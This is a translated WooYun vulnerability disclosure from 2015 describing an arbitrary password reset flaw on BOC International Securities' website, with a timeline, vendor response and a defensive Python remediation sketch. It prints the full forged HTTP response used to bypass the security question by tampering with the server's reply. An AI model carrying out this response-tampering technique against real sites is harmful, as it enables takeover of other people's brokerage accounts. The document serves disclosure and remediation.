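Vulnerability Summary

Bug ID: wooyun-2015-0121040

Title: Arbitrary user password reset vulnerability at BOC International Securities (中银国际证券)

Vendor: BOC International Securities (中银国际证券)

Author: wooyun.org

Submitted: 2015-06-17 16:51

Fixed: 2015-08-06 10:00

Disclosed: 2015-08-06 10:00

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 12

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org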


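Vulnerability Details

Disclosure status:

2015-06-17: Details reported to the vendor; waiting for the vendor to handle them
2015-06-22: Vendor confirmed; details disclosed to the vendor only
2015-07-02: Details disclosed to core white hats and experts in the relevant field
2015-07-12: Details disclosed to regular white hats
2015-07-22: Details disclosed to trainee white hats
2015-08-06: Details disclosed to the public

Brief description:

You know the drill.

Detailed description: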

http://www.bocichina.com/boci/login/forgetPassword.jsp


11.png


This is the one.

22.png


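Fill in anything as the answer to the security question and capture the traffic. Intercept the returned response and send the following response in its place!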

HTTP/1.1 200 OK
Date: Tue, 16 Jun 2015 21:04:08 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html;charset=UTF-8
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 ID-0000627501262144 uproxy-2
Content-Length: 5035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link href="/boci/css/css.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="/boci/share/js/jsUtils.js"></script>
<title>中银国际证券</title>
<link rel="shortcut icon" href="/boci/pic/favicon.ico"/>
<link rel="BookMark" href="/boci/pic/favicon.ico"/>
<style type="text/css">
<!--
.STYLE1 {color: #920022}
.STYLE2 {color: #348800}
.STYLE5 {
font-family:"微软雅黑", "宋体";
font-size: 18px;
font-weight: bold;
padding:10px;
}
-->
</style>
</head>
<script>
</script>
<script>
function check(){
var password=document.getElementById("passWord").value;
if(/^([A-Z]|[a-z]|[\d])*$/.test(password)==false||password.length<6||password.length>12){
alert("密码为 6-12 位字母或数字");
document.getElementById("passWord").value="";
document.getElementById("passWord").focus();
return false;
}
// Check whether the new password and the old password are the same
var password_1=document.getElementById("passWord_1").value;
if(password!=password_1){
alert("两次输入密码不相同");
document.getElementById("passWord_1").value="";
document.getElementById("passWord_1").focus();
return false;
}
}
</script>
<body>
<div id="layout">
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff" height="60">
<tr>
<td><a href="/boci/index/index.jsp?firstMenu=qtcd_index"><img src="/boci/pic/logo.jpg" width="315" height="60" border="0" /></a></td>
<td width="427"></td>
</tr>
</table>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff">
<tr>
<td width="900" background="/boci/pic/menu_07.jpg"><img src="/boci/pic/menu_07.jpg" width="6" height="13" /></td>
</tr>
</table>
</td>
</tr>
</table>
<table width="900" border="0" cellspacing="0" cellpadding="0">
<form action="/boci/user.do?method=updatePassword" method="post" name="thisForm" id="thisForm" onsubmit="return check()">
<tr>
<td width="20"></td>
<td height="35" background="/boci/pic/zcgl_30.jpg" class="text14" style="padding-left:60px;">忘记密码</td>
<td width="20"></td>
</tr>
<tr>
<td></td>
<td height="35" style="padding:10px; line-height:25px;"><p><table width="750" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><img src="/boci/pic/login/tab_top.gif" height="11" /></td>
</tr>
<tr>
<td valign="top" background="/boci/pic/login/tab_mid.gif" style="padding:10px 20px;"><table width="33%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="10"></td>
</tr>
</table>
<table width="35%" border="0" cellpadding="0" cellspacing="0" align="center">

<tr align="left" bgcolor="#F2F2F2">
<td colspan="3" style="padding: 2px 15px;">请输入新密码 :
<input name="passWord" id="passWord" type="password" class="sousuotiao" size="18" style="border:1px solid #cccccc;" />
</td>
</tr>

<tr align="left" bgcolor="#F2F2F2">
<td colspan="3" style="padding: 2px 15px;">新 密码 确认 :
<input name="passWord_1" id="passWord_1" type="password" class="sousuotiao" size="18" style="border:1px solid #cccccc;" />
</td>
</tr>
</table>
<table width="97" border="0" align="center" cellpadding="0" cellspacing="0">

<tr>
<td height="20"></td>
</tr>
</table>

<table width="33%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="center">
<td height="15"><input type="submit" name="Submit2" value="确定" class="button4" /></td>
</tr>
</table>


</td>
</tr>
<tr>
<td align="center"><img src="/boci/pic/login/tab_bot.gif" height="11" /></td>
</tr>
</table></td>
<td></td>
</tr>
<tr>
<td></td>
<td height="35" class="text14" style="padding-left:10px;">&nbsp;</td>
<td></td>
</tr>
</form>
</table>
<table width="900" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><iframe src="/boci/share/foot.jsp" frameborder="0" width="900" height="64" scrolling="no"></iframe></td>
</tr>
</table>
</div>
</body>
</html>


This successfully jumps to the change-password page.

33.png


44.png

55.png

Proof of vulnerability:

1.png

Remediation:
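The flow above reaches the change-password form by swapping the server's response, which only works if `/boci/user.do?method=updatePassword` does not itself check that the security question was answered. The sketch below is an added example, not code from the original report or from the vendor: a framework-independent Python model in which step 2 accepts only a single-use, expiring token issued by step 1, and takes the account name from that token rather than from the request. The class, function names, TTL and sample account are all assumptions.

```python
import hashlib, hmac, re, secrets, time

RESET_TTL = 600  # seconds a verified reset stays usable (assumed value)

def _h(value: str) -> str:
    return hashlib.sha256(value.encode()).hexdigest()

class ResetFlow:
    """Hypothetical server-side model of a two-step password reset."""

    def __init__(self, users):
        self.users = users    # username -> {"answer_hash": ..., "pw": (salt, hash)}
        self.pending = {}     # sha256(token) -> (username, expiry)

    def verify_answer(self, username, answer, now=None):
        """Step 1: issue a one-time token only when the answer is correct."""
        now = time.time() if now is None else now
        user = self.users.get(username)
        # Unknown users are compared against a random hash so both paths look alike.
        expected = user["answer_hash"] if user else _h(secrets.token_hex(16))
        if not hmac.compare_digest(_h(answer), expected):
            return None
        token = secrets.token_urlsafe(32)
        self.pending[_h(token)] = (username, now + RESET_TTL)
        return token

    def update_password(self, token, new_password, now=None):
        """Step 2: accept the change only for a token issued by step 1."""
        now = time.time() if now is None else now
        # Same rule as the page's client-side check(), enforced on the server.
        if not re.fullmatch(r"[A-Za-z0-9]{6,12}", new_password or ""):
            return False
        entry = self.pending.pop(_h(token or ""), None)   # single use
        if entry is None or now > entry[1]:
            return False
        username, _ = entry                               # account comes from the token
        salt = secrets.token_bytes(16)
        digest = hashlib.pbkdf2_hmac("sha256", new_password.encode(), salt, 100_000)
        self.users[username]["pw"] = (salt, digest)
        return True

def make_demo_flow():
    # Constructed sample account; not data from the page.
    return ResetFlow({"alice": {"answer_hash": _h("blue"), "pw": None}})
```

With this structure, a browser that is shown the change-password form without passing step 1 holds no valid token, so the submission is rejected regardless of what page the client rendered.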

Copyright notice: when reposting, please credit the source wooyun.org@乌云 (WooYun)


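Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-06-22 09:59

Vendor reply:

CNVD confirmed and reproduced the situation described, and has passed it to CNCERT to notify the authority in charge of informatization for the securities industry, which will then coordinate with the organization that manages the website to handle it.

Latest status:

None yet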